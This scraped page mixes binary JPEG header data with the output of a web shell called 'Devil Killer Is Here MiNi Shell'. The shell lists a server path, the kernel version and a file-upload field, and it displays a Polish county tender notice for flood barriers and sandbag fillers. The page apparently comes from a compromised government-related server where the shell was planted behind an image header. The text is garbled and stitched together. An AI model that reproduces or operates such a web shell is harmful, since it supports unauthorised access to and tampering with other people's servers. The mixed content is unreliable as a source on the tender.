JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251105/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20251105/0051751101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Doposażenie bazy magazynowej na potrzeby ochrony ludności i obrony cywilnej w Powiecie Kamiennogórskim </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Kamiennogórski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821300</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wł. Broniewskiego 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kamienna Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">powiat@kamienna-gora.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kamienna-gora.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Doposażenie bazy magazynowej na potrzeby ochrony ludności i obrony cywilnej w Powiecie Kamiennogórskim </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6125fe6e-f3e0-4566-9b16-66af831dd33f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00517511</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-11-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00020416/14/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.7 Doposażenie bazy magazynowej na potrzeby ochrony ludności i obrony cywilnej w Powiecie Kamiennogórskim</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/sp_kamiennagora <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/sp_kamiennagora</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa się za pomocą środków komunikacji elektronicznej, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje przekazywane są w formie elektronicznej za pośrednictwem Platformy: https://platformazakupowa.pl/pn/sp_kamiennagora <br/>2.	Informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej:<br/>1)	wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane będą w formie elektronicznej za pośrednictwem Platformy i formularza „Wyślij wiadomość do Zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem Platformy poprzez kliknięcie przycisku „Wyślij wiadomość do Zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do Zamawiającego,<br/>2)	Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za pośrednictwem Platformy. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem Platformy do konkretnego Wykonawcy,<br/>3)	Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na Platformie przesłanych przez Zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM,<br/>4)	Zamawiający, zgodnie z zapisami rozporządzenia Prezesa Rady Ministrów w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zmówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452), określa niezbędne wymagania sprzętowo – aplikacyjne umożliwiające pracę na Platformie, tj.:<br/>a)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>b)	komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych – MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje;<br/>c)	zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer;<br/>d)	włączona obsługa JavaScript;<br/>e)	zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf;<br/>f)	szyfrowanie na Platformie odbywa się za pomocą protokołu TLS 1.3.;<br/>g)	oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>3.	Wszelką korespondencję związaną z niniejszym postępowaniem, należy przekazywać za pośrednictwem Platformy. Korespondencję uważa się za przekazaną w terminie, jeżeli dotrze do zamawiającego przed upływem wymaganego terminu. <br/>4.	Zamawiający dopuszcza możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres e-mail: inwestycje@kamienna-gora.pl <br/>5.	Do porozumiewania się z Wykonawcami w trakcie trwania postępowania po stronie Zamawiającego upoważniona jest Agnieszka Ławniczak i Artur Pasiut. Kontakt z upoważnioną osobą możliwy jest za pośrednictwem platformy lub za pośrednictwem e-mail: inwestycje@kamienna-gora.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1, ze zm.), dalej „RODO”, informuję, że:<br/>1)	administratorem Pani/Pana danych osobowych jest Powiat Kamiennogórski z siedzibą w Kamiennej Górze przy ul. Wł. Broniewskiego 15. Może się Pani/Pan kontaktować z nim w następujący sposób - listownie na adres: ul. Wł. Broniewskiego 15, 58-400 Kamienna Góra lub przez elektroniczną skrzynkę podawczą: /lm8tu33i2e/SkrytkaESP;<br/>2)	w sprawach związanych z Pani/Pana danymi osobowymi proszę kontaktować się z Inspektorem Ochrony Danych, w następujący sposób – listownie na adres: ul. Wł. Broniewskiego 15, 58-400 Kamienna Góra lub za pośrednictwem poczty elektronicznej pod adresem: iod@kamienna-gora.pl <br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięcia, jak również zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia publicznego i jego archiwizacji;<br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp oraz Prezes Urzędu Zamówień Publicznych z siedzibą w Warszawie (02-676) przy ul. Postępu 17A jako Administrator Danych Osobowych Użytkowników Platformy e-Zamówienia, na której Urząd Ochrony Danych Osobowych prowadzi postępowania o udzielenie zamówienia publicznego, działając pod adresem https://ezamowienia.gov.pl/pl/<br/>5)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>6)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>7)	Posiada Pan/Pani:<br/>-	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>-	na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych, przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu postępowania oraz jego załączników;<br/>-	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia;<br/>-	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ID.272.3.23.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia stanowi: Doposażenie bazy magazynowej na potrzeby ochrony ludności i obrony cywilnej w Powiecie Kamiennogórskim - Część 1 – Dostawa napełniacza do worków z piaskiem.<br/>Zamówienie finansowane w ramach Programu Ochrony Ludności i Obrony Cywilnej na lata 2025-2026.<br/>Szczegółowy opis przedmiotu zamówienia, opis wymagań Zamawiającego w zakresie realizacji i odbioru określają:<br/>1)	opis przedmiotu zamówienia – Tom III SWZ,<br/>2)	projektowane postanowienia umowy – Tom II do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42921000-8 - Maszyny do czyszczenia, napełniania, pakowania zbiorczego lub jednostkowego butelek, lub innych pojemników</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przy wyborze ofert będzie kierował się następującymi kryteriami:<br/>1)	Zasady oceny Kryterium 1: Cena oferty (KC):<br/>Zamawiający oceniając cenę oferty, weźmie pod uwagę cenę oferty wskazaną przez Wykonawcę w Formularzu oferty.<br/>Sposób oceny: <br/>Punkty zostaną przyznane według następującego wzoru:<br/><br/>Kc =(Kcn/Kco)x 60 pkt<br/><br/>Kcn – oznacza najniższą zaproponowaną cenę,<br/>Kco – oznacza cenę zaproponowaną w ofercie badanej,<br/>Kc – liczbę punktów przyznanych badanej ofercie w Kryterium 1: Cena oferty <br/>Waga kryterium – 60%.<br/>Oferta w tym kryterium może otrzymać maksymalnie 60 pkt.<br/><br/>2)	Kryterium 2: Skrócony termin dostawy (KT):<br/>Złożenie oferty jest jednoznaczne z przyjęciem przez Wykonawcę przynajmniej maksymalnego terminu wykonania zamówienia, tj. 21 dni od dnia zawarcia umowy w sprawie zamówienia publicznego. Zama-wiający oceniając skrócenie terminu wykonania zamówienia, weźmie pod uwagę liczbę dni kalendarzo-wych deklarowanego przez Wykonawcę skrócenia terminu wykonania zamówienia w stosunku do mak-symalnego. Wykonawca może skrócić termin wykonania zamówienia o pełną liczbę dni od 4 do 7. W przypadku wskazania niepełnej liczby dni, np. 1,5 w celu oceny ofert Zamawiający dokona zaokrąglenia do liczby pełnej w dół – z „1,5 – 1”.<br/><br/>Sposób oceny:<br/>Punkty zostaną przyznane według następującego wzoru:<br/><br/>KT =(STOB/STmax)x 20 pkt<br/>	<br/>gdzie:<br/>STOB – oznacza liczbę dni skrócenia terminu zaoferowanego przez Wykonawcę<br/>STmax – 7 (maksymalna ilość dni skrócenia)<br/>KT – liczbę punktów przyznanych badanej ofercie w Kryterium 2: Skrócenie terminu wykonania zamó-wienia <br/><br/>Wykonawca deklaruje, o jaki okres skróci termin wykonania w Formularzu oferty. <br/><br/>Waga kryterium – 20%.<br/><br/>Oferta w tym kryterium może otrzymać maksymalnie 20 pkt.<br/><br/>W przypadku gdy Wykonawca zadeklaruje skrócenie terminu wykonania zamówienia o więcej niż 7 dni kalendarzowych w celu oceny ofert Zamawiający przyjmie, że Wykonawca deklaruje skrócenie terminu wykonania zamówienia o 7 dni kalendarzowych. <br/>W przypadku gdy Wykonawca w Formularzu oferty nie wskaże liczby dni skrócenia terminu wykonania zamówienia w ramach oceny ofert otrzyma 0 (zero) punktów.<br/><br/>3)	Kryterium 3: Rozszerzona rękojmia na towar w czasie przechowywania (KR):<br/>Złożenie oferty jest jednoznaczne z przyjęciem przez Wykonawcę maksymalnego okresu rękojmi wynoszącego 24 miesiące. Zamawiający oceniając rozszerzoną rękojmię na towar w czasie przechowywania, weźmie pod uwagę liczbę miesięcy deklarowanego okresu rozszerzenia rękojmi na towar w czasie przechowywania w stosunku do maksymalnego. Wykonawca może rozszerzyć okres rękojmi na towar w czasie przechowywania o pełną liczbę miesięcy od 1 do 12 miesięcy. W przypadku wskazania niepełnej liczby miesięcy, np. 1,5 w celu oceny ofert Zamawiający dokona zaokrąglenia do liczby pełnej w dół – z „1,5 – 1”.<br/>Wykonawca deklaruje, okres rozszerzenie rękojmi na towar w czasie przechowywania w Formularzu oferty. <br/>Sposób oceny:<br/>Punkty zostaną przyznane według następującego wzoru:<br/><br/>KG2 =(RTOB/RTmax)x 20 pkt<br/><br/>gdzie:<br/>RTOB – oznacza liczbę miesięcy rozszerzenia rękojmi na towar w czasie przechowywania zaoferowaną przez Wykonawcę<br/>RTmax – 12 (maksymalna ilość miesięcy rozszerzonej rękojmi)<br/>KG2 – liczbę punktów przyznanych badanej ofercie w Kryterium 3: Rozszerzona rękojmia na towar w czasie przechowywania <br/><br/>Waga kryterium – 20%.<br/><br/>Oferta w tym kryterium może otrzymać maksymalnie 20 pkt.<br/>W przypadku gdy wykonawca zadeklaruje rozszerzenie rękojmi na towar w czasie przechowywania o więcej niż 12 miesięcy w celu oceny ofert Zamawiający przyjmie, że Wykonawca deklaruje rozszerzenie rękojmi na towar w czasie przechowywania o 12 miesięcy. <br/>W przypadku gdy Wykonawca w Formularzu oferty nie wskaże liczby miesięcy rozszerzonej rękojmi na towar w czasie przechowywania w ramach oceny ofert otrzyma 0 (zero) punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócony termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rozszerzona rękojmia na towar w czasie przechowywania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia stanowi: Doposażenie bazy magazynowej na potrzeby ochrony ludności i obrony cywilnej w Powiecie Kamiennogórskim - Część 2 – Dostawa zapory przeciwpowodziowej.<br/>Zamówienie finansowane w ramach Programu Ochrony Ludności i Obrony Cywilnej na lata 2025-2026.<br/>Szczegółowy opis przedmiotu zamówienia, opis wymagań Zamawiającego w zakresie realizacji i odbioru określają:<br/>1)	opis przedmiotu zamówienia – Tom III SWZ,<br/>2)	projektowane postanowienia umowy – Tom II do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44212382-0 - Tamy przeciwpowodziowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przy wyborze ofert będzie kierował się następującymi kryteriami:<br/>1)	Zasady oceny Kryterium 1: Cena oferty (KC):<br/>Zamawiający oceniając cenę oferty, weźmie pod uwagę cenę oferty wskazaną przez Wykonawcę w Formularzu oferty.<br/>Sposób oceny: <br/>Punkty zostaną przyznane według następującego wzoru:<br/><br/>Kc =(Kcn/Kco)x 60 pkt	<br/>gdzie:<br/>Kcn – oznacza najniższą zaproponowaną cenę,<br/>Kco – oznacza cenę zaproponowaną w ofercie badanej,<br/>Kc – liczbę punktów przyznanych badanej ofercie w Kryterium 1: Cena oferty <br/>Waga kryterium – 60%.<br/>Oferta w tym kryterium może otrzymać maksymalnie 60 pkt.<br/><br/>2)	Kryterium 2: Skrócony termin dostawy (KT):<br/><br/>Złożenie oferty jest jednoznaczne z przyjęciem przez Wykonawcę przynajmniej maksymalnego terminu wykonania zamówienia, tj. 21 dni od dnia zawarcia umowy w sprawie zamówienia publicznego. Zama-wiający oceniając skrócenie terminu wykonania zamówienia, weźmie pod uwagę liczbę dni kalendarzo-wych deklarowanego przez Wykonawcę skrócenia terminu wykonania zamówienia w stosunku do mak-symalnego. Wykonawca może skrócić termin wykonania zamówienia o pełną liczbę dni od 4 do 7. W przypadku wskazania niepełnej liczby dni, np. 1,5 w celu oceny ofert Zamawiający dokona zaokrąglenia do liczby pełnej w dół – z „1,5 – 1”.<br/><br/>Sposób oceny:<br/>Punkty zostaną przyznane według następującego wzoru:<br/><br/>KT =(STOB/STmax)x 20 pkt<br/>gdzie:<br/>STOB – 